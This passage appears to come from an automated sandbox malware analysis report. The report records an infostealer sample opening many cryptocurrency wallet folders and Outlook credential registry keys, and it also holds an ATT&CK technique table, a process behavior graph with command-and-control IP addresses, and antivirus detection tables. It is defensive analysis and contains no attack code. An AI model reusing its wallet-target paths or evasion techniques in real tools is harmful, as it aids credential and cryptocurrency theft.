                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Binance\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
                      Source: C:\Users\user\AppData\Local\Temp\1019032001\513dad5c05.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZ
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKN
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFX
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSB
                      Source: C:\Users\user\AppData\Local\Temp\1019031001\77594b3442.exeDirectory queried: number of queries: 1001
                      Source: Yara matchFile source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                      Source: Yara matchFile source: Process Memory Space: 9d4ddc637a.exe PID: 5600, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 77594b3442.exe PID: 7456, type: MEMORYSTR
                      Source: Yara matchFile source: 00000038.00000003.2987064495.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 513dad5c05.exe PID: 7432, type: MEMORYSTR
                      Source: Yara matchFile source: 43.0.7d28d37061cb43098969a37cf25a380a.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000F.00000002.2742198429.0000000003B95000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.2742198429.0000000003CBA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 4268204ace.exe PID: 7312, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: 7d28d37061cb43098969a37cf25a380a.exe PID: 5916, type: MEMORYSTR
                      Source: Yara matchFile source: C:\pnpyqs\7d28d37061cb43098969a37cf25a380a.exe, type: DROPPED
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information1
                      Scripting
                      Valid Accounts2
                      Windows Management Instrumentation
                      1
                      Scripting
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts11
                      Native API
                      1
                      DLL Side-Loading
                      1
                      Access Token Manipulation
                      11
                      Deobfuscate/Decode Files or Information
                      1
                      Credentials in Registry
                      24
                      File and Directory Discovery
                      Remote Desktop Protocol31
                      Data from Local System
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts12
                      Command and Scripting Interpreter
                      11
                      Scheduled Task/Job
                      212
                      Process Injection
                      5
                      Obfuscated Files or Information
                      Security Account Manager2510
                      System Information Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Remote Access Software
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal Accounts11
                      Scheduled Task/Job
                      11
                      Registry Run Keys / Startup Folder
                      11
                      Scheduled Task/Job
                      13
                      Software Packing
                      NTDS981
                      Security Software Discovery
                      Distributed Component Object ModelInput Capture1
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud Accounts2
                      PowerShell
                      Network Logon Script11
                      Registry Run Keys / Startup Folder
                      1
                      Timestomp
                      LSA Secrets3
                      Process Discovery
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials381
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                      Masquerading
                      DCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job381
                      Virtualization/Sandbox Evasion
                      Proc Filesystem11
                      Remote System Discovery
                      Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Access Token Manipulation
                      /etc/passwd and /etc/shadow1
                      System Network Configuration Discovery
                      Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                      Process Injection
                      Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1579188 Sample: file.exe Startdate: 21/12/2024 Architecture: WINDOWS Score: 100 176 Found malware configuration 2->176 178 Malicious sample detected (through community Yara rule) 2->178 180 Antivirus detection for dropped file 2->180 182 19 other signatures 2->182 10 skotes.exe 6 83 2->10         started        15 file.exe 5 2->15         started        17 Intel_PTT_EK_Recertification.exe 2->17         started        19 3 other processes 2->19 process3 dnsIp4 150 185.215.113.43 WHOLESALECONNECTIONSNL Portugal 10->150 152 185.215.113.16 WHOLESALECONNECTIONSNL Portugal 10->152 154 31.41.244.11 AEROEXPRESS-ASRU Russian Federation 10->154 124 C:\Users\user\AppData\...\73c096c84a.exe, PE32 10->124 dropped 126 C:\Users\user\AppData\...\d7884c562e.exe, PE32 10->126 dropped 128 C:\Users\user\AppData\...\fcd2b0e3cd.exe, PE32 10->128 dropped 134 25 other malicious files 10->134 dropped 218 Creates multiple autostart registry keys 10->218 220 Hides threads from debuggers 10->220 222 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->222 21 513dad5c05.exe 10->21         started        26 77594b3442.exe 10->26         started        28 4268204ace.exe 15 8 10->28         started        40 4 other processes 10->40 130 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->130 dropped 132 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->132 dropped 224 Detected unpacking (changes PE section rights) 15->224 226 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 15->226 228 Tries to evade debugger and weak emulator (self modifying code) 15->228 230 Tries to detect virtualization through RDTSC time measurements 15->230 30 skotes.exe 15->30         started        232 Suspicious powershell command line found 17->232 234 Found strings related to Crypto-Mining 17->234 236 Injects code into the Windows Explorer (explorer.exe) 17->236 32 powershell.exe 17->32         started        34 explorer.exe 17->34         started        156 184.30.17.174 AKAMAI-ASUS United States 19->156 238 Modifies the context of a thread in another process (thread injection) 19->238 240 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 19->240 36 powershell.exe 19->36         started        38 explorer.exe 19->38         started        file5 signatures6 process7 dnsIp8 136 185.215.113.206 WHOLESALECONNECTIONSNL Portugal 21->136 106 C:\Users\user\Documents\CAAEBKEGHJ.exe, PE32 21->106 dropped 120 13 other files (9 malicious) 21->120 dropped 192 Drops PE files to the document folder of the user 21->192 194 Tries to steal Mail credentials (via file / registry access) 21->194 212 6 other signatures 21->212 42 chrome.exe 21->42         started        138 104.21.21.99 CLOUDFLARENETUS United States 26->138 108 C:\Users\user\...\MCGXXRICH6C9X2RWLNL.exe, PE32 26->108 dropped 110 C:\Users\user\...\975RDI33VTLWGIQACCE.exe, PE32 26->110 dropped 196 Detected unpacking (changes PE section rights) 26->196 198 Query firmware table information (likely to detect VMs) 26->198 200 Tries to detect sandboxes and other dynamic analysis tools (window names) 26->200 202 LummaC encrypted strings found 26->202 140 20.233.83.145 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 28->140 142 185.199.110.133 FASTLYUS Netherlands 28->142 112 C:\...\7d28d37061cb43098969a37cf25a380a.exe, PE32 28->112 dropped 114 C:\...\5119130eb96345a8a13dc770d0f33571.exe, PE32 28->114 dropped 204 Multi AV Scanner detection for dropped file 28->204 206 Adds a directory exclusion to Windows Defender 28->206 44 7d28d37061cb43098969a37cf25a380a.exe 28->44         started        48 powershell.exe 28->48         started        50 powershell.exe 28->50         started        60 2 other processes 28->60 208 Creates HTML files with .exe extension (expired dropper behavior) 30->208 214 2 other signatures 30->214 52 PING.EXE 32->52         started        54 conhost.exe 32->54         started        56 conhost.exe 36->56         started        144 185.156.73.23 RELDAS-NETRU Russian Federation 40->144 146 185.121.15.192 REDSERVICIOES Spain 40->146 148 2 other IPs or domains 40->148 116 C:\Users\user\AppData\Local\...\Y-Cleaner.exe, PE32 40->116 dropped 118 C:\Users\user\...\Bunifu_UI_v1.5.3.dll, PE32 40->118 dropped 122 4 other files (2 malicious) 40->122 dropped 210 Binary is likely a compiled AutoIt script file 40->210 216 2 other signatures 40->216 58 cmd.exe 2 40->58         started        file9 signatures10 process11 dnsIp12 160 149.154.167.99 TELEGRAMRU United Kingdom 44->160 162 116.203.12.114 HETZNER-ASDE Germany 44->162 242 Attempt to bypass Chrome Application-Bound Encryption 44->242 244 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 44->244 246 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 44->246 252 3 other signatures 44->252 62 chrome.exe 44->62         started        248 Loading BitLocker PowerShell Module 48->248 65 conhost.exe 48->65         started        67 conhost.exe 50->67         started        164 127.1.10.1 unknown unknown 52->164 250 Uses cmd line tools excessively to alter registry or file data 58->250 69 in.exe 58->69         started        73 7z.exe 58->73         started        75 7z.exe 3 58->75         started        77 9 other processes 58->77 166 184.30.21.144 AKAMAI-ASUS United States 60->166 signatures13 process14 dnsIp15 168 239.255.255.250 unknown Reserved 62->168 79 chrome.exe 62->79         started        102 C:\Users\...\Intel_PTT_EK_Recertification.exe, PE32+ 69->102 dropped 186 Suspicious powershell command line found 69->186 188 Uses cmd line tools excessively to alter registry or file data 69->188 190 Uses schtasks.exe or at.exe to add and modify task schedules 69->190 82 powershell.exe 69->82         started        85 attrib.exe 69->85         started        87 attrib.exe 69->87         started        89 schtasks.exe 69->89         started        104 C:\Users\user\AppData\Local\Temp\...\in.exe, PE32+ 73->104 dropped file16 signatures17 process18 dnsIp19 170 142.250.181.132 GOOGLEUS United States 79->170 172 142.250.181.99 GOOGLEUS United States 79->172 174 3 other IPs or domains 79->174 184 Uses ping.exe to check the status of other devices and networks 82->184 91 PING.EXE 82->91         started        94 conhost.exe 82->94         started        96 conhost.exe 85->96         started        98 conhost.exe 87->98         started        100 conhost.exe 89->100         started        signatures20 process21 dnsIp22 158 127.0.0.1 unknown unknown 91->158

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      file.exe56%VirustotalBrowse
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML
                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%AviraTR/Crypt.TPM.Gen
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%AviraHEUR/AGEN.1320706
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%AviraTR/Crypt.TPM.Gen
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%AviraTR/Crypt.XPACK.Gen
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[3].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[3].exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe100%Joe Sandbox ML
                      C:\ProgramData\freebl3.dll0%ReversingLabs
                      C:\ProgramData\freebl3.dll0%VirustotalBrowse
                      C:\ProgramData\mozglue.dll0%ReversingLabs
                      C:\ProgramData\mozglue.dll0%VirustotalBrowse
                      C:\ProgramData\msvcp140.dll0%ReversingLabs
                      C:\ProgramData\msvcp140.dll0%VirustotalBrowse
                      C:\ProgramData\nss3.dll0%ReversingLabs
                      C:\ProgramData\nss3.dll0%VirustotalBrowse
                      C:\ProgramData\softokn3.dll0%ReversingLabs
                      C:\ProgramData\vcruntime140.dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll0%ReversingLabs
                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe38%ReversingLabsWin32.Infostealer.Generic
